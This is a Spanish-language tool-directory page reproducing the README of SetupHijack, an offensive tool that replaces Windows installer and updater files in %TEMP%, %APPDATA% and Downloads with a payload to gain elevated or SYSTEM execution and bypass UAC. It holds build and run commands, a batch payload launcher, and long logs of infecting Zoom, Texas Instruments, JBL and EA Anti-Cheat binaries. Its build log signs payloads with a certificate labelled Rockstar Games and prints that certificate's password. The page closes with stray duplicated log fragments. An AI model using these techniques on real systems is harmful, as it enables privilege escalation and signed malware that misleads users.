Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SetupHijack — SetupHijack es una herramienta de investigación de seguridad que explota condiciones de carrera y manejo inseguro de archivos en los procesos de instalación y actualización de aplicaciones de Windows. | Kitploit
Herramientas/GitHubGitHub/hackerhouse-opensource/setuphijack
Escalada de PrivilegiosGeneración de PayloadsExplotaciónMovimiento LateralPruebas de PenetraciónRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack es una herramienta de investigación de seguridad que explota condiciones de carrera y manejo inseguro de archivos en los procesos de instalación y actualización de aplicaciones de Windows.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
26429hace 6 mesesRevisado por Kitploit

SetupHijack


Resumen

SetupHijack es una herramienta de investigación de seguridad que explota condiciones de carrera y gestión insegura de archivos en procesos de instalación y actualización de Windows. Se dirige a escenarios donde instaladores o actualizadores privilegiados colocan archivos en %TEMP% u otras ubicaciones de escritura global, lo que permite a un atacante reemplazar estos archivos antes de que se ejecuten con privilegios elevados.

  • No requiere permisos elevados para ejecutarse.
  • No utiliza notificaciones del sistema de archivos (realiza sondeos para detectar cambios).
  • Explota debilidades en la firma de código Authenticode y en los modelos de confianza de los instaladores.
  • Puede infectar archivos .exe, .msi y por lotes (p. ej., sysinfo, netstat, ipconfig).
  • Diseñado únicamente para uso en red team, pruebas de penetración e investigación de seguridad.

El uso previsto de esta herramienta es ejecutarse en segundo plano en una cuenta de usuario comprometida con privilegios, con el fin de elevar otro proceso secuestrando las descargas de archivos del instalador/actualizador.

El gráfico siguiente muestra ejemplos reales de casos de uso de este exploit en múltiples escenarios que pueden utilizarse para la omisión de UAC. Las omisiones de UAC se consideran un límite de seguridad cuando se ejecuta sin privilegios de administrador y son un "requisito común del atacante" para deshabilitar controles de seguridad. La explotación de operaciones privilegiadas de administrador proporciona accesibilidad genérica al exploit para que el código malicioso realice carga lateral o escale privilegios de proceso. Esta herramienta puede utilizarse para identificar aplicaciones adicionales que están expuestas a los mismos tipos de riesgo; un atacante puede esperar a la ejecución de estos procesos como medio para obtener derechos elevados sin alterar el comportamiento del usuario.

Gráfico de descubrimiento de vulnerabilidades de SetupHijack

Cómo funciona

  1. SetupHijack escanea continuamente %TEMP% (y subdirectorios) en busca de archivos de instalación nuevos o modificados.
  2. Cuando se detecta un archivo objetivo, se reemplaza con un payload proporcionado por el usuario (EXE, MSI o BAT), conservando opcionalmente el original como archivo .bak.
  3. Si el proceso privilegiado ejecuta el archivo reemplazado antes de las comprobaciones de integridad, el payload se ejecuta con derechos elevados (p. ej., SYSTEM o Administrador).
  4. La herramienta registra todas las acciones y mantiene una lista de omisión para evitar reinfectar los mismos archivos.

Nota sobre la firma de código

Este proyecto utiliza un proceso de firma de código modificado con SignToolEx.exe y SignToolExHook.dll para firmar payloads e instaladores. El uso de certificados de firma de código válidos y una marca de tiempo Authenticode aumentará su tasa de éxito al omitir las comprobaciones de confianza del instalador y del sistema operativo.


Uso

Compilación```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### Ejecutar (Opciones)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • Ejecute SetupHijack.exe antes o durante un proceso privilegiado de instalación/actualización.
  • Por defecto, la herramienta escanea todas las ubicaciones de colocación comunes: %TEMP%, %APPDATA% y %USERPROFILE%\Downloads.
  • Puede desactivar cualquier ubicación con los indicadores -notemp, -noappdata o -nodownloads.
  • El indicador clean restaura las copias de seguridad en todas las ubicaciones habilitadas. El indicador verbose registra todas las acciones.
  • Para la escalada remota, utilícelo con shadow.exe o herramientas similares en Servicios de Terminal.

Flujo de ataque de ejemplo

  1. Construya su payload y SetupHijack: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. Iniciar SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. Ejecute el instalador o el proceso de actualización de destino como Administrador.
  4. Si el instalador coloca archivos en %TEMP% y los ejecuta con privilegios elevados, su payload será sustituido y ejecutado.

Ejemplo de Salida

A continuación se muestra un ejemplo real de compilación y ejecución de SetupHijack, incluida la firma de código y la salida de infección:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## Ejemplo de uso para desplegar un implante

A continuación se muestra una captura de pantalla de SetupHijack en acción, desplegando un implante durante una ejecución privilegiada del instalador:

![Ejemplo de uso para desplegar un implante](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## Notas de seguridad

- Esta herramienta es solo para pruebas e investigaciones autorizadas.
- Explotar estas debilidades puede resultar en un compromiso total del sistema (SYSTEM) cuando el usuario está en el grupo de Administradores.
- Los instaladores pueden usar comprobaciones de hash/firma que bloquearán este ataque, pero muchos aún no lo hacen.
- Úsala siempre en un entorno controlado.
- Si descubres un CVE u obtienes una recompensa (bounty) con esta herramienta, ¡danos el crédito!

Apuntar a un solo directorio (como `%TEMP%`) a la vez puede aumentar la probabilidad de ganar cualquier condición de carrera de tiempo de creación/tiempo de uso (TOCTOU), ya que permite un sondeo más rápido y menos contención. Para una máxima fiabilidad, ejecuta múltiples instancias de SetupHijack, cada una enfocada en un único directorio. Para obtener resultados óptimos, asegúrate de que tu payload (el EXE que deseas ejecutar elevado) incluya un manifiesto que solicite elevación (requireAdministrator), y esté firmado con un certificado de firma de código válido que incluya una marca de tiempo Authenticode. Esto aumenta la probabilidad de eludir las comprobaciones de confianza del instalador y del sistema operativo en los instaladores.

## Vulnerabilidades identificadas

La siguiente lista no exhaustiva se ha identificado con los "mejores escenarios" al ejecutar .MSI no confiables que resultan en "NT AUTHORITY\SYSTEM", pero muchos procesos "elevados por UAC"
a menudo se ejecutarán mediante archivos .bat. Debido a que la ejecución ocurre bajo el mismo SID de usuario, y como %TEMP% es único para el SID de usuario construido bajo %USERPROFILE%
como parte de la creación de la sesión interna, puedes escalar dentro de comandos de la misma sesión a integridad alta con permisos completos mediante la manipulación de .bat que hereda 
los derechos del proceso padre. "Ejecución de comandos elevada mediante archivo temporal" es un hallazgo común, que puede usarse para la omisión de UAC y la ejecución sin administrador, ya que el 
aviso en el escritorio seguro muestra la aplicación explotada (por ejemplo, una actualización de Zoom). 

- Zoom 6.6.1 (15968) usa %AppData% para la instalación y actualización de .exe, lo que permite movimiento lateral de procesos y
  suplantación de procesos (por ejemplo, enviar una solicitud de elevación desde la actualización de Zoom). Los ejecutables pueden manipularse fácilmente
  para ataques de robo de credenciales y fines maliciosos.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe al ejecutar install.msi se ejecuta bajo NT AUTHORITY\SYSTEM

  • El exe de actualización de Wireshark pasa por %Temp%, no ganó la carrera.

  • Las comprobaciones de firma de código de Visual Studio en las actualizaciones evitan la explotación, (probado ligeramente .VSIX)

  • El instalador de Texas Instrument Code Composer puede ser explotado para eludir la autenticación de UAC 09/25/2025. (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Se ha observado que Cursor IDE crea archivos .bat e historial de comandos en %TEMP% que pueden ser explotados para inyectar
  comandos en el historial de Cursor, elevación limitada. 


- JBL Quantum Engine contiene una vulnerabilidad de inyección de comandos (ya parcheada) que ejecuta "net" (incluido .bat) desde el
  mismo directorio desde el que se ejecuta JBL_QuantumENGINE_1.11.0.1511_x64. La última versión utiliza un nuevo instalador que
  no es vulnerable a esta vulnerabilidad específica de inyección de comandos (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). Este
  problema fue descubierto como 0day en noviembre de 2022. Puede usarse para omitir las restricciones de UAC y obtener derechos elevados 
  de Administrador. El servicio SYSTEM escribe archivos .bat en %TEMP% para depuración/diagnóstico. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer": ejecución arbitraria de comandos con privilegios elevados. Títulos de EA como "skate." instalarán un servicio antitrampas que utiliza una ubicación temporal y escribible por el usuario. Un atacante puede reemplazar el EAAntiCheat.Installer.exe durante la instalación de STEAM, y un aviso de elevación de UAC vendrá del motor de STEAM, con el logotipo y el icono de Valve, pero ejecutará tu payload exe con permisos elevados. Consulta las capturas de pantalla de EASkateUAC para usarlas en ataques de bypass(¿confusión?) de UAC.``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# Licencia

Estos archivos están disponibles bajo la licencia BSD de 3 cláusulas.
Descargar herramienta
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS